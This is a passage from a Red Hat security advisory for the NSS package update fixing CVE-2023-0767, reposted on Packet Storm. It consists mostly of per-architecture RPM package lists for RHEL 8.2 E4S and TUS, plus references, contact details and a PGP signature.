nss-softokn-freebl-debuginfo-3.53.1-13.el8_2.s390x.rpm  
nss-softokn-freebl-devel-3.53.1-13.el8_2.s390x.rpm  
nss-sysinit-3.53.1-13.el8_2.s390x.rpm  
nss-sysinit-debuginfo-3.53.1-13.el8_2.s390x.rpm  
nss-tools-3.53.1-13.el8_2.s390x.rpm  
nss-tools-debuginfo-3.53.1-13.el8_2.s390x.rpm  
nss-util-3.53.1-13.el8_2.s390x.rpm  
nss-util-debuginfo-3.53.1-13.el8_2.s390x.rpm  
nss-util-devel-3.53.1-13.el8_2.s390x.rpm

x86_64:  
nss-3.53.1-13.el8_2.i686.rpm  
nss-3.53.1-13.el8_2.x86_64.rpm  
nss-debuginfo-3.53.1-13.el8_2.i686.rpm  
nss-debuginfo-3.53.1-13.el8_2.x86_64.rpm  
nss-debugsource-3.53.1-13.el8_2.i686.rpm  
nss-debugsource-3.53.1-13.el8_2.x86_64.rpm  
nss-devel-3.53.1-13.el8_2.i686.rpm  
nss-devel-3.53.1-13.el8_2.x86_64.rpm  
nss-softokn-3.53.1-13.el8_2.i686.rpm  
nss-softokn-3.53.1-13.el8_2.x86_64.rpm  
nss-softokn-debuginfo-3.53.1-13.el8_2.i686.rpm  
nss-softokn-debuginfo-3.53.1-13.el8_2.x86_64.rpm  
nss-softokn-devel-3.53.1-13.el8_2.i686.rpm  
nss-softokn-devel-3.53.1-13.el8_2.x86_64.rpm  
nss-softokn-freebl-3.53.1-13.el8_2.i686.rpm  
nss-softokn-freebl-3.53.1-13.el8_2.x86_64.rpm  
nss-softokn-freebl-debuginfo-3.53.1-13.el8_2.i686.rpm  
nss-softokn-freebl-debuginfo-3.53.1-13.el8_2.x86_64.rpm  
nss-softokn-freebl-devel-3.53.1-13.el8_2.i686.rpm  
nss-softokn-freebl-devel-3.53.1-13.el8_2.x86_64.rpm  
nss-sysinit-3.53.1-13.el8_2.x86_64.rpm  
nss-sysinit-debuginfo-3.53.1-13.el8_2.i686.rpm  
nss-sysinit-debuginfo-3.53.1-13.el8_2.x86_64.rpm  
nss-tools-3.53.1-13.el8_2.x86_64.rpm  
nss-tools-debuginfo-3.53.1-13.el8_2.i686.rpm  
nss-tools-debuginfo-3.53.1-13.el8_2.x86_64.rpm  
nss-util-3.53.1-13.el8_2.i686.rpm  
nss-util-3.53.1-13.el8_2.x86_64.rpm  
nss-util-debuginfo-3.53.1-13.el8_2.i686.rpm  
nss-util-debuginfo-3.53.1-13.el8_2.x86_64.rpm  
nss-util-devel-3.53.1-13.el8_2.i686.rpm  
nss-util-devel-3.53.1-13.el8_2.x86_64.rpm

Red Hat Enterprise Linux AppStream E4S (v. 8.2):

Source:  
nss-3.53.1-13.el8_2.src.rpm

aarch64:  
nss-3.53.1-13.el8_2.aarch64.rpm  
nss-debuginfo-3.53.1-13.el8_2.aarch64.rpm  
nss-debugsource-3.53.1-13.el8_2.aarch64.rpm  
nss-devel-3.53.1-13.el8_2.aarch64.rpm  
nss-softokn-3.53.1-13.el8_2.aarch64.rpm  
nss-softokn-debuginfo-3.53.1-13.el8_2.aarch64.rpm  
nss-softokn-devel-3.53.1-13.el8_2.aarch64.rpm  
nss-softokn-freebl-3.53.1-13.el8_2.aarch64.rpm  
nss-softokn-freebl-debuginfo-3.53.1-13.el8_2.aarch64.rpm  
nss-softokn-freebl-devel-3.53.1-13.el8_2.aarch64.rpm  
nss-sysinit-3.53.1-13.el8_2.aarch64.rpm  
nss-sysinit-debuginfo-3.53.1-13.el8_2.aarch64.rpm  
nss-tools-3.53.1-13.el8_2.aarch64.rpm  
nss-tools-debuginfo-3.53.1-13.el8_2.aarch64.rpm  
nss-util-3.53.1-13.el8_2.aarch64.rpm  
nss-util-debuginfo-3.53.1-13.el8_2.aarch64.rpm  
nss-util-devel-3.53.1-13.el8_2.aarch64.rpm

ppc64le:  
nss-3.53.1-13.el8_2.ppc64le.rpm  
nss-debuginfo-3.53.1-13.el8_2.ppc64le.rpm  
nss-debugsource-3.53.1-13.el8_2.ppc64le.rpm  
nss-devel-3.53.1-13.el8_2.ppc64le.rpm  
nss-softokn-3.53.1-13.el8_2.ppc64le.rpm  
nss-softokn-debuginfo-3.53.1-13.el8_2.ppc64le.rpm  
nss-softokn-devel-3.53.1-13.el8_2.ppc64le.rpm  
nss-softokn-freebl-3.53.1-13.el8_2.ppc64le.rpm  
nss-softokn-freebl-debuginfo-3.53.1-13.el8_2.ppc64le.rpm  
nss-softokn-freebl-devel-3.53.1-13.el8_2.ppc64le.rpm  
nss-sysinit-3.53.1-13.el8_2.ppc64le.rpm  
nss-sysinit-debuginfo-3.53.1-13.el8_2.ppc64le.rpm  
nss-tools-3.53.1-13.el8_2.ppc64le.rpm  
nss-tools-debuginfo-3.53.1-13.el8_2.ppc64le.rpm  
nss-util-3.53.1-13.el8_2.ppc64le.rpm  
nss-util-debuginfo-3.53.1-13.el8_2.ppc64le.rpm  
nss-util-devel-3.53.1-13.el8_2.ppc64le.rpm

s390x:  
nss-3.53.1-13.el8_2.s390x.rpm  
nss-debuginfo-3.53.1-13.el8_2.s390x.rpm  
nss-debugsource-3.53.1-13.el8_2.s390x.rpm  
nss-devel-3.53.1-13.el8_2.s390x.rpm  
nss-softokn-3.53.1-13.el8_2.s390x.rpm  
nss-softokn-debuginfo-3.53.1-13.el8_2.s390x.rpm  
nss-softokn-devel-3.53.1-13.el8_2.s390x.rpm  
nss-softokn-freebl-3.53.1-13.el8_2.s390x.rpm  
nss-softokn-freebl-debuginfo-3.53.1-13.el8_2.s390x.rpm  
nss-softokn-freebl-devel-3.53.1-13.el8_2.s390x.rpm  
nss-sysinit-3.53.1-13.el8_2.s390x.rpm  
nss-sysinit-debuginfo-3.53.1-13.el8_2.s390x.rpm  
nss-tools-3.53.1-13.el8_2.s390x.rpm  
nss-tools-debuginfo-3.53.1-13.el8_2.s390x.rpm  
nss-util-3.53.1-13.el8_2.s390x.rpm  
nss-util-debuginfo-3.53.1-13.el8_2.s390x.rpm  
nss-util-devel-3.53.1-13.el8_2.s390x.rpm

x86_64:  
nss-3.53.1-13.el8_2.i686.rpm  
nss-3.53.1-13.el8_2.x86_64.rpm  
nss-debuginfo-3.53.1-13.el8_2.i686.rpm  
nss-debuginfo-3.53.1-13.el8_2.x86_64.rpm  
nss-debugsource-3.53.1-13.el8_2.i686.rpm  
nss-debugsource-3.53.1-13.el8_2.x86_64.rpm  
nss-devel-3.53.1-13.el8_2.i686.rpm  
nss-devel-3.53.1-13.el8_2.x86_64.rpm  
nss-softokn-3.53.1-13.el8_2.i686.rpm  
nss-softokn-3.53.1-13.el8_2.x86_64.rpm  
nss-softokn-debuginfo-3.53.1-13.el8_2.i686.rpm  
nss-softokn-debuginfo-3.53.1-13.el8_2.x86_64.rpm  
nss-softokn-devel-3.53.1-13.el8_2.i686.rpm  
nss-softokn-devel-3.53.1-13.el8_2.x86_64.rpm  
nss-softokn-freebl-3.53.1-13.el8_2.i686.rpm  
nss-softokn-freebl-3.53.1-13.el8_2.x86_64.rpm  
nss-softokn-freebl-debuginfo-3.53.1-13.el8_2.i686.rpm  
nss-softokn-freebl-debuginfo-3.53.1-13.el8_2.x86_64.rpm  
nss-softokn-freebl-devel-3.53.1-13.el8_2.i686.rpm  
nss-softokn-freebl-devel-3.53.1-13.el8_2.x86_64.rpm  
nss-sysinit-3.53.1-13.el8_2.x86_64.rpm  
nss-sysinit-debuginfo-3.53.1-13.el8_2.i686.rpm  
nss-sysinit-debuginfo-3.53.1-13.el8_2.x86_64.rpm  
nss-tools-3.53.1-13.el8_2.x86_64.rpm  
nss-tools-debuginfo-3.53.1-13.el8_2.i686.rpm  
nss-tools-debuginfo-3.53.1-13.el8_2.x86_64.rpm  
nss-util-3.53.1-13.el8_2.i686.rpm  
nss-util-3.53.1-13.el8_2.x86_64.rpm  
nss-util-debuginfo-3.53.1-13.el8_2.i686.rpm  
nss-util-debuginfo-3.53.1-13.el8_2.x86_64.rpm  
nss-util-devel-3.53.1-13.el8_2.i686.rpm  
nss-util-devel-3.53.1-13.el8_2.x86_64.rpm

Red Hat Enterprise Linux AppStream TUS (v. 8.2):

Source:  
nss-3.53.1-13.el8_2.src.rpm

aarch64:  
nss-3.53.1-13.el8_2.aarch64.rpm  
nss-debuginfo-3.53.1-13.el8_2.aarch64.rpm  
nss-debugsource-3.53.1-13.el8_2.aarch64.rpm  
nss-devel-3.53.1-13.el8_2.aarch64.rpm  
nss-softokn-3.53.1-13.el8_2.aarch64.rpm  
nss-softokn-debuginfo-3.53.1-13.el8_2.aarch64.rpm  
nss-softokn-devel-3.53.1-13.el8_2.aarch64.rpm  
nss-softokn-freebl-3.53.1-13.el8_2.aarch64.rpm  
nss-softokn-freebl-debuginfo-3.53.1-13.el8_2.aarch64.rpm  
nss-softokn-freebl-devel-3.53.1-13.el8_2.aarch64.rpm  
nss-sysinit-3.53.1-13.el8_2.aarch64.rpm  
nss-sysinit-debuginfo-3.53.1-13.el8_2.aarch64.rpm  
nss-tools-3.53.1-13.el8_2.aarch64.rpm  
nss-tools-debuginfo-3.53.1-13.el8_2.aarch64.rpm  
nss-util-3.53.1-13.el8_2.aarch64.rpm  
nss-util-debuginfo-3.53.1-13.el8_2.aarch64.rpm  
nss-util-devel-3.53.1-13.el8_2.aarch64.rpm

ppc64le:  
nss-3.53.1-13.el8_2.ppc64le.rpm  
nss-debuginfo-3.53.1-13.el8_2.ppc64le.rpm  
nss-debugsource-3.53.1-13.el8_2.ppc64le.rpm  
nss-devel-3.53.1-13.el8_2.ppc64le.rpm  
nss-softokn-3.53.1-13.el8_2.ppc64le.rpm  
nss-softokn-debuginfo-3.53.1-13.el8_2.ppc64le.rpm  
nss-softokn-devel-3.53.1-13.el8_2.ppc64le.rpm  
nss-softokn-freebl-3.53.1-13.el8_2.ppc64le.rpm  
nss-softokn-freebl-debuginfo-3.53.1-13.el8_2.ppc64le.rpm  
nss-softokn-freebl-devel-3.53.1-13.el8_2.ppc64le.rpm  
nss-sysinit-3.53.1-13.el8_2.ppc64le.rpm  
nss-sysinit-debuginfo-3.53.1-13.el8_2.ppc64le.rpm  
nss-tools-3.53.1-13.el8_2.ppc64le.rpm  
nss-tools-debuginfo-3.53.1-13.el8_2.ppc64le.rpm  
nss-util-3.53.1-13.el8_2.ppc64le.rpm  
nss-util-debuginfo-3.53.1-13.el8_2.ppc64le.rpm  
nss-util-devel-3.53.1-13.el8_2.ppc64le.rpm

s390x:  
nss-3.53.1-13.el8_2.s390x.rpm  
nss-debuginfo-3.53.1-13.el8_2.s390x.rpm  
nss-debugsource-3.53.1-13.el8_2.s390x.rpm  
nss-devel-3.53.1-13.el8_2.s390x.rpm  
nss-softokn-3.53.1-13.el8_2.s390x.rpm  
nss-softokn-debuginfo-3.53.1-13.el8_2.s390x.rpm  
nss-softokn-devel-3.53.1-13.el8_2.s390x.rpm  
nss-softokn-freebl-3.53.1-13.el8_2.s390x.rpm  
nss-softokn-freebl-debuginfo-3.53.1-13.el8_2.s390x.rpm  
nss-softokn-freebl-devel-3.53.1-13.el8_2.s390x.rpm  
nss-sysinit-3.53.1-13.el8_2.s390x.rpm  
nss-sysinit-debuginfo-3.53.1-13.el8_2.s390x.rpm  
nss-tools-3.53.1-13.el8_2.s390x.rpm  
nss-tools-debuginfo-3.53.1-13.el8_2.s390x.rpm  
nss-util-3.53.1-13.el8_2.s390x.rpm  
nss-util-debuginfo-3.53.1-13.el8_2.s390x.rpm  
nss-util-devel-3.53.1-13.el8_2.s390x.rpm

x86_64:  
nss-3.53.1-13.el8_2.i686.rpm  
nss-3.53.1-13.el8_2.x86_64.rpm  
nss-debuginfo-3.53.1-13.el8_2.i686.rpm  
nss-debuginfo-3.53.1-13.el8_2.x86_64.rpm  
nss-debugsource-3.53.1-13.el8_2.i686.rpm  
nss-debugsource-3.53.1-13.el8_2.x86_64.rpm  
nss-devel-3.53.1-13.el8_2.i686.rpm  
nss-devel-3.53.1-13.el8_2.x86_64.rpm  
nss-softokn-3.53.1-13.el8_2.i686.rpm  
nss-softokn-3.53.1-13.el8_2.x86_64.rpm  
nss-softokn-debuginfo-3.53.1-13.el8_2.i686.rpm  
nss-softokn-debuginfo-3.53.1-13.el8_2.x86_64.rpm  
nss-softokn-devel-3.53.1-13.el8_2.i686.rpm  
nss-softokn-devel-3.53.1-13.el8_2.x86_64.rpm  
nss-softokn-freebl-3.53.1-13.el8_2.i686.rpm  
nss-softokn-freebl-3.53.1-13.el8_2.x86_64.rpm  
nss-softokn-freebl-debuginfo-3.53.1-13.el8_2.i686.rpm  
nss-softokn-freebl-debuginfo-3.53.1-13.el8_2.x86_64.rpm  
nss-softokn-freebl-devel-3.53.1-13.el8_2.i686.rpm  
nss-softokn-freebl-devel-3.53.1-13.el8_2.x86_64.rpm  
nss-sysinit-3.53.1-13.el8_2.x86_64.rpm  
nss-sysinit-debuginfo-3.53.1-13.el8_2.i686.rpm  
nss-sysinit-debuginfo-3.53.1-13.el8_2.x86_64.rpm  
nss-tools-3.53.1-13.el8_2.x86_64.rpm  
nss-tools-debuginfo-3.53.1-13.el8_2.i686.rpm  
nss-tools-debuginfo-3.53.1-13.el8_2.x86_64.rpm  
nss-util-3.53.1-13.el8_2.i686.rpm  
nss-util-3.53.1-13.el8_2.x86_64.rpm  
nss-util-debuginfo-3.53.1-13.el8_2.i686.rpm  
nss-util-debuginfo-3.53.1-13.el8_2.x86_64.rpm  
nss-util-devel-3.53.1-13.el8_2.i686.rpm  
nss-util-devel-3.53.1-13.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0767  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZBxe+dzjgjWX9erEAQgVwA/+IBlJG0b42blekqQi5m59kTCOI8Dx9QgV  
4ZBgPpOtwfMi2jmwG754CT9TqX3AL54vWPI7AravL4uPRPl4iYKDtYxQkCfT8kS9  
9UONxRafYT41m85WWmVz6lNwB+CepaxLoGa5kkmoS3i5/k5vMiTKS64k2u1dwP7a  
IByruQA1AnB1y64SF12dRNyZtZdLNXR1KbEjky+ZyhIrsoaUF7O22jGyOE96KodS  
76Fefaq1AYHA0heg3nvZeSpT2md9lJVveinFQ2NQoot6GPPyfFhFFyvocrZeqoko  
6f0idf4QJrigftvPIv8B/rNkZVQM9ILNL3jVFrRx8Q+BcJ0WZdioqFoivt4/Y/W3  
lqwIa69X0JKQfajsp/NpCOawwavYxFJgL2jnLQBZ09J6jBhgkjoTZx051Tad02m6  
8Pe7HVP+0NXCPGUtSaR5kPdeGzS6VjwBRHpa1WX8xISbYfe9G/SyB8c/E1lSjITP  
dwwGs+foTED+xRZV16bWlHgcL2GTzFaoSYL4bi8l0pn0pDNVBzK6m+C9U9uh1ENz  
BaG6v6K6KpJ/zWXFolNczEyAi1NgcxOD16yK3Hl6IjkQAQBqH5bTOIpLUtvyfmk5  
3VZokf1RVzByjYenvmsUlqciJPC6dOFoozy3UUFCRiXKuVeWrtx48dx5enVpYmxH  
whMZIzQsfKE=UL8Q  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Source

Packet Storm